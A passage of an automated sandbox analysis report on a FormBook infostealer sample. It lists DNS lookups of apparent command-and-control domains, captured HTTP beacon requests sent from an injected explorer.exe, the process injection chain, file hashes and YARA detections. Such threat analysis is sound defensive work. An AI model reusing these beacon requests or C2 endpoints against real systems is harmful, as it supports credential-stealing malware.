| Feb 23, 2021 10:07:39.826229095 CET | 192.168.2.4 | 8.8.8.8 | 0x44b2 | Standard query (0) | www.sissysundays.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:45.170499086 CET | 192.168.2.4 | 8.8.8.8 | 0xc969 | Standard query (0) | www.whereinthezooareyou.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:50.495853901 CET | 192.168.2.4 | 8.8.8.8 | 0x124b | Standard query (0) | www.fertinvitro.doctor | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:55.765499115 CET | 192.168.2.4 | 8.8.8.8 | 0x84a | Standard query (0) | www.dgcsales.net | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:01.316922903 CET | 192.168.2.4 | 8.8.8.8 | 0xa3d7 | Standard query (0) | www.horisan-touki.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:07.241117001 CET | 192.168.2.4 | 8.8.8.8 | 0xd8a9 | Standard query (0) | www.karthikeyainfraindia.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:13.424010992 CET | 192.168.2.4 | 8.8.8.8 | 0x23bd | Standard query (0) | www.guilhermeoliveiro.site | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:18.501543045 CET | 192.168.2.4 | 8.8.8.8 | 0x59b6 | Standard query (0) | www.buysellleasewithlisa.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:23.691322088 CET | 192.168.2.4 | 8.8.8.8 | 0x6122 | Standard query (0) | www.besteprobioticakopen.online | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:28.857777119 CET | 192.168.2.4 | 8.8.8.8 | 0x81e3 | Standard query (0) | www.grandwhale.com | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:34.280643940 CET | 192.168.2.4 | 8.8.8.8 | 0xd8a3 | Standard query (0) | www.smallbathroomdecor.info | A (IP address) | IN (0x0001) |

                                                                        DNS Answers

| Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
|---|---|---|---|---|---|---|---|---|---|
| Feb 23, 2021 10:07:34.111540079 CET | 8.8.8.8 | 192.168.2.4 | 0xbdbf | No error (0) | www.fastenerspelosato.net | | 142.91.239.112 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:39.901096106 CET | 8.8.8.8 | 192.168.2.4 | 0x44b2 | No error (0) | www.sissysundays.com | shops.myshopify.com | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:39.901096106 CET | 8.8.8.8 | 192.168.2.4 | 0x44b2 | No error (0) | shops.myshopify.com | | 23.227.38.74 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:45.274060011 CET | 8.8.8.8 | 192.168.2.4 | 0xc969 | No error (0) | www.whereinthezooareyou.com | www9.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:45.274060011 CET | 8.8.8.8 | 192.168.2.4 | 0xc969 | No error (0) | www9.wixdns.net | balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:45.274060011 CET | 8.8.8.8 | 192.168.2.4 | 0xc969 | No error (0) | balancer.wixdns.net | 5f36b111-balancer.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:45.274060011 CET | 8.8.8.8 | 192.168.2.4 | 0xc969 | No error (0) | 5f36b111-balancer.wixdns.net | td-balancer-euw2-6-109.wixdns.net | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:45.274060011 CET | 8.8.8.8 | 192.168.2.4 | 0xc969 | No error (0) | td-balancer-euw2-6-109.wixdns.net | | 35.246.6.109 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:50.556087017 CET | 8.8.8.8 | 192.168.2.4 | 0x124b | No error (0) | www.fertinvitro.doctor | fertinvitro.doctor | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:50.556087017 CET | 8.8.8.8 | 192.168.2.4 | 0x124b | No error (0) | fertinvitro.doctor | | 34.102.136.180 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:07:55.909749031 CET | 8.8.8.8 | 192.168.2.4 | 0x84a | No error (0) | www.dgcsales.net | dgcsales.net | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:07:55.909749031 CET | 8.8.8.8 | 192.168.2.4 | 0x84a | No error (0) | dgcsales.net | | 184.106.16.223 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:01.609078884 CET | 8.8.8.8 | 192.168.2.4 | 0xa3d7 | No error (0) | www.horisan-touki.com | | 118.27.99.84 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:08.043203115 CET | 8.8.8.8 | 192.168.2.4 | 0xd8a9 | No error (0) | www.karthikeyainfraindia.com | karthikeyainfraindia.com | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:08:08.043203115 CET | 8.8.8.8 | 192.168.2.4 | 0xd8a9 | No error (0) | karthikeyainfraindia.com | | 202.66.173.116 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:13.486955881 CET | 8.8.8.8 | 192.168.2.4 | 0x23bd | Name error (3) | www.guilhermeoliveiro.site | none | none | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:18.562619925 CET | 8.8.8.8 | 192.168.2.4 | 0x59b6 | No error (0) | www.buysellleasewithlisa.com | buysellleasewithlisa.com | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:08:18.562619925 CET | 8.8.8.8 | 192.168.2.4 | 0x59b6 | No error (0) | buysellleasewithlisa.com | | 160.153.136.3 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:23.758831978 CET | 8.8.8.8 | 192.168.2.4 | 0x6122 | No error (0) | www.besteprobioticakopen.online | | 94.23.162.163 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:29.010719061 CET | 8.8.8.8 | 192.168.2.4 | 0x81e3 | No error (0) | www.grandwhale.com | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | CNAME (Canonical name) | IN (0x0001) |
| Feb 23, 2021 10:08:29.010719061 CET | 8.8.8.8 | 192.168.2.4 | 0x81e3 | No error (0) | HDRedirect-LB7-5a03e1c2772e1c9c.elb.us-east-1.amazonaws.com | | 3.223.115.185 | A (IP address) | IN (0x0001) |
| Feb 23, 2021 10:08:34.656076908 CET | 8.8.8.8 | 192.168.2.4 | 0xd8a3 | No error (0) | www.smallbathroomdecor.info | | 88.214.207.96 | A (IP address) | IN (0x0001) |

                                                                        HTTP Request Dependency Graph

                                                                        • www.fastenerspelosato.net
                                                                        • www.sissysundays.com
                                                                        • www.whereinthezooareyou.com
                                                                        • www.fertinvitro.doctor
                                                                        • www.dgcsales.net
                                                                        • www.horisan-touki.com
                                                                        • www.karthikeyainfraindia.com
                                                                        • www.buysellleasewithlisa.com
                                                                        • www.besteprobioticakopen.online

                                                                        HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49755 | 142.91.239.112 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:07:34.316319942 CET | 2184 | OUT | GET /uszn/?I48=ilzBSMt+mC5PnIueaE0o4kFNHHW8rQxTZUVxaBcrk7HNT8xc6ayAEkd5Nrf40/DEmyGF&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fastenerspelosato.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Feb 23, 2021 10:07:34.844446898 CET | 2186 | IN | HTTP/1.1 500 Internal Server Error
                                                                        Cache-Control: private
                                                                        Content-Type: text/html; charset=utf-8
                                                                        Server: Microsoft-IIS/8.5
                                                                        X-AspNet-Version: 4.0.30319
                                                                        X-Powered-By: ASP.NET
                                                                        Access-Control-Allow-Origin: *
                                                                        Access-Control-Allow-Headers: *
                                                                        Access-Control-Allow-Methods: GET, POST
                                                                        Date: Tue, 23 Feb 2021 09:07:20 GMT
                                                                        Connection: close
                                                                        Content-Length: 4112
                                                                        Data Ascii: <!DOCTYPE html><html> <head> <title> null<br>: input</title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy; cursor:hand; }
Feb 23, 2021 10:07:34.844474077 CET | 2187 | IN |
                                                                        Data Ascii: @media screen and (max-width: 639px) { pre { width: 440px; overflow: auto; white-space: pre-wrap; word-wrap: break-word; } } @media screen and (max-width: 479px) { pre { width: 280px; }
Feb 23, 2021 10:07:34.844491005 CET | 2188 | IN |
                                                                        Data Ascii: <br> <b>:</b> <br><br> <table width=100% bgcolor="#ffffcc"> <tr> <td> <code><pre>[ArgumentNullException: null
Feb 23, 2021 10:07:34.844508886 CET | 2189 | IN |
                                                                        Data Ascii: System.Web.HttpApplication.SyncEventExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute() System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)-->...


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49761 | 23.227.38.74 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:07:39.943531036 CET | 5544 | OUT | GET /uszn/?I48=52ikA0v5VO8qsylJfSO1DetMiatJe0E1D9rBoJ+nHZYmtxf70roQflY+S8wYouTF3o6y&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.sissysundays.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Feb 23, 2021 10:07:40.155996084 CET | 5545 | IN | HTTP/1.1 403 Forbidden
                                                                        Date: Tue, 23 Feb 2021 09:07:40 GMT
                                                                        Content-Type: text/html
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        Vary: Accept-Encoding
                                                                        X-Sorting-Hat-PodId: 162
                                                                        X-Sorting-Hat-ShopId: 41524953251
                                                                        X-Dc: gcp-us-central1
                                                                        X-Request-ID: a4514485-1370-4802-9169-ac7871220421
                                                                        Set-Cookie: _shopify_fs=2021-02-23T09%3A07%3A40Z; Expires=Wed, 23-Feb-22 09:07:40 GMT; Domain=sissysundays.com; Path=/; SameSite=Lax
                                                                        X-Download-Options: noopen
                                                                        X-Permitted-Cross-Domain-Policies: none
                                                                        X-Content-Type-Options: nosniff
                                                                        X-XSS-Protection: 1; mode=block
                                                                        CF-Cache-Status: DYNAMIC
                                                                        cf-request-id: 086fbdfb48000005c87fa67000000001
                                                                        Server: cloudflare
                                                                        CF-RAY: 625fcc3edc8705c8-FRA
                                                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                        Data Ascii: 141d<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <meta name="referrer" content="never" /> <title>Access denied</title> <style type="text/css"> *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#F1F1F1;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}a:hover{border-bottom-color:#A9A9A9}h1{fon
Feb 23, 2021 10:07:40.156027079 CET | 5546 | IN |
                                                                        Data Ascii: t-size:1.8rem;font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6r
Feb 23, 2021 10:07:40.156047106 CET | 5548 | IN |
                                                                        Data Ascii: " }, "pt-BR": { "title": "Acesso negado", "content-title": "Voc no tem permisso para acessar este site" }, "es": { "title": "Acceso denegado", "content-title": "No tienes permi
Feb 23, 2021 10:07:40.156064987 CET | 5549 | IN |
                                                                        Data Ascii: "en": { "title": "Access denied", "content-title": "You do not have permission to access this website" }, "hi": { "title": " ", "content-title": "
Feb 23, 2021 10:07:40.156079054 CET | 5550 | IN |
                                                                        Data Ascii: browsers navigator.userLanguage || // IE <= 10 "en"; language = language.split("-")[0]; // Strip country code translations = t[language] || t["en"]; // Replace content on screen for (var id in translations) { target = docu


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49762 | 35.246.6.109 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:07:45.340125084 CET | 5574 | OUT | GET /uszn/?I48=lR8nCh02VBrVevH9DBfx7BVzy1/OBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.whereinthezooareyou.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
Feb 23, 2021 10:07:45.453417063 CET | 5575 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Date: Tue, 23 Feb 2021 09:07:45 GMT
                                                                        Content-Length: 0
                                                                        Connection: close
                                                                        location: https://www.robinblumenthal.org/uszn?I48=lR8nCh02VBrVevH9DBfx7BVzy1%2FOBYfsNcE9m+G8n0i7QYmfgEfs3uLKSpan4882ouVy&ofrxU=yVMtQLoX
                                                                        strict-transport-security: max-age=120
                                                                        x-wix-request-id: 1614071265.391552393778121902
                                                                        Age: 0
                                                                        Server-Timing: cache;desc=miss, varnish;desc=miss, dc;desc=euw2
                                                                        X-Seen-By: sHU62EDOGnH2FBkJkG/Wx8EeXWsWdHrhlvbxtlynkViPPFLGwJgVO8FUAmFQQjPN,qquldgcFrj2n046g4RNSVAWNqgzSMQ+UB9IQX4udZ+Q=,2d58ifebGbosy5xc+FRalpYUTcl7jQzo4Essi/VLLwgt8VDvZy3pJDWZp9dMiwKn3fKEXQvQlSAkB/lstal9R4Q918uQbzzG9w1LffIdX9I=,2UNV7KOq4oGjA5+PKsX47F8xRgV30iIDzySL0NmaUxo=,m7d0zj9X6FBqkyAIyh66vEUuqjNSZoImFoqkUKlu7gqTzRA6xkSHdTdM1EufzDIPWIHlCalF7YnfvOr2cMPpyw==,4EmzKGKKpFffqfFwZRPY8boZ8ve2m8xk1D+l4lZPQBgFvmIDoEcoOIUTBKMVcbKcH2yWikl2EP5bJKtoyukhjw==
                                                                        Cache-Control: no-cache
                                                                        Expires: -1
                                                                        Server: Pepyaka/1.19.0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49763 | 34.102.136.180 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 10:07:50.608117104 CET | 5576 | OUT | GET /uszn/?I48=z5jHb1CZWrsr2p16zetrIsrl3FBZKeiByVV0oSV+dvaqVG1rneJc4YmewlelB8A40GEQ&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.fertinvitro.doctor
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:50.751897097 CET | 5577 | IN | HTTP/1.1 403 Forbidden
                                                                        Server: openresty
                                                                        Date: Tue, 23 Feb 2021 09:07:50 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 275
                                                                        ETag: "6031584e-113"
                                                                        Via: 1.1 google
                                                                        Connection: close
                                                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        4 | 192.168.2.4 | 49764 | 184.106.16.223 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Feb 23, 2021 10:07:56.064671040 CET | 5577 | OUT | GET /uszn/?I48=hu5lsjyQ8jtyvTSzqUKsO9FdlIq7HJAoGWXF85Byxyx8kG/0QeCZ2D448NGSTsl89HtB&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.dgcsales.net
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:07:56.290729046 CET | 5578 | IN | HTTP/1.1 302 Found
                                                                        cache-control: private
                                                                        content-type: text/html; charset=utf-8
                                                                        location: http://www.dmt.ca/nosite.html
                                                                        date: Tue, 23 Feb 2021 09:07:56 GMT
                                                                        content-length: 146
                                                                        connection: close
                                                                        Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="http://www.dmt.ca/nosite.html">here</a>.</h2></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        5 | 192.168.2.4 | 49765 | 118.27.99.84 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Feb 23, 2021 10:08:01.909493923 CET | 5580 | OUT | GET /uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.horisan-touki.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:02.207866907 CET | 5580 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx
                                                                        Date: Tue, 23 Feb 2021 09:08:02 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 162
                                                                        Connection: close
                                                                        Location: https://www.horisan-touki.com/uszn/?I48=QfBSKsl5Vu8QEYvg6r6EpYBO+tHghinNKHDEOdj6/CEQOiVDlwCi9gx1TH+D8HDA3Ujy&ofrxU=yVMtQLoX
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        6 | 192.168.2.4 | 49766 | 202.66.173.116 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Feb 23, 2021 10:08:08.227961063 CET | 5581 | OUT | GET /uszn/?I48=L/tqFlZRmZhJZD1iC7RgW0bOgnRBAskMdyXY70yD3QYv5j7RY53hkHd2ZTpB0JeH3WIq&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.karthikeyainfraindia.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:08.410000086 CET | 5583 | IN | HTTP/1.1 404 Not Found
                                                                        Content-Type: text/html
                                                                        Server: Microsoft-IIS/8.0
                                                                        X-Powered-By: ASP.NET
                                                                        X-Powered-By-Plesk: PleskWin
                                                                        Date: Tue, 23 Feb 2021 09:08:03 GMT
                                                                        Connection: close
                                                                        Content-Length: 1245
                                                                        Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - File or directory not found.</title><style type="text/css">...body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}fieldset{padding:0 15px 10px 15px;} h1{font-size:2.4em;margin:0;color:#FFF;}h2{font-size:1.7em;margin:0;color:#CC0000;} h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;} #header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;background-color:#555555;}#content{margin:0 0 0 2%;position:relative;}.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}--></style></head><body><div id="header"><h1>Server Error</h1></div><div id="content"> <div class="content-container"><fieldset> <h2>404 - File or directory not found.</h2> <h3>The resource you are looking for might have bee
                                                                        Feb 23, 2021 10:08:08.410028934 CET | 5583 | IN
                                                                        Data Ascii: n removed, had its name changed, or is temporarily unavailable.</h3> </fieldset></div></div></body></html>


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        7 | 192.168.2.4 | 49769 | 160.153.136.3 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Feb 23, 2021 10:08:18.614079952 CET | 5603 | OUT | GET /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.buysellleasewithlisa.com
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:18.663569927 CET | 5603 | IN | HTTP/1.1 302 Found
                                                                        Connection: close
                                                                        Pragma: no-cache
                                                                        cache-control: no-cache
                                                                        Location: /uszn/?I48=mPpTgQkduQgKd9eKHDnKxG7Zl5xM97I2KtefNy7cE9uF2W6RPqZ+V0j9JFBrxigWFYGz&ofrxU=yVMtQLoX


                                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                        8 | 192.168.2.4 | 49770 | 94.23.162.163 | 80 | C:\Windows\explorer.exe
                                                                        Timestamp | kBytes transferred | Direction | Data
                                                                        Feb 23, 2021 10:08:23.806049109 CET | 5604 | OUT | GET /uszn/?I48=5LoNRXVM8eyE2Me8xFE40xCr0JzPAOX0MOzM3KUbBxAS8JEwG8sqp8Wi1O663rh9uwDV&ofrxU=yVMtQLoX HTTP/1.1
                                                                        Host: www.besteprobioticakopen.online
                                                                        Connection: close
                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                        Data Ascii:
                                                                        Feb 23, 2021 10:08:23.850476980 CET | 5604 | IN | HTTP/1.1 301 Moved Permanently
                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                        Date: Tue, 23 Feb 2021 09:08:23 GMT
                                                                        Content-Type: text/html
                                                                        Content-Length: 194
                                                                        Connection: close
                                                                        Location: http://www.besteprobioticakopen.online/
                                                                        Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                        Code Manipulations

                                                                        Statistics

                                                                        CPU Usage

                                                                        Memory Usage

                                                                        High Level Behavior Distribution

                                                                        Behavior

                                                                        System Behavior

                                                                        General

                                                                        Start time:10:06:23
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:'C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe'
                                                                        Imagebase:0x6e0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:.Net C# or VB.NET
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.689872337.0000000003CC9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:41
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:{path}
                                                                        Imagebase:0x310000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:42
                                                                        Start date:23/02/2021
                                                                        Path:C:\Users\user\Desktop\0O9BJfVJi6fEMoS.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:{path}
                                                                        Imagebase:0xaa0000
                                                                        File size:816640 bytes
                                                                        MD5 hash:18EC78E09155C046A203FB4DCBC3593F
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.730806558.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732150923.00000000010C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.732300917.0000000001110000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        Reputation:low

                                                                        General

                                                                        Start time:10:06:44
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\explorer.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:
                                                                        Imagebase:0x7ff6fee60000
                                                                        File size:3933184 bytes
                                                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high

                                                                        General

                                                                        Start time:10:07:00
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\autofmt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\SysWOW64\autofmt.exe
                                                                        Imagebase:0xc70000
                                                                        File size:831488 bytes
                                                                        MD5 hash:7FC345F685C2A58283872D851316ACC4
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate

                                                                        General

                                                                        Start time:10:07:01
                                                                        Start date:23/02/2021
                                                                        Path:C:\Windows\SysWOW64\explorer.exe
                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\SysWOW64\explorer.exe
                                                                        Imagebase:0x13e0000
                                                                        File size:3611360 bytes
                                                                        MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Yara matches:
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.910849108.0000000000970000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Joe Security
                                                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.911281407.0000000000FB0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.911225919.0000000000F80000.00000040.00000001.sdmp, Author: Joe Security
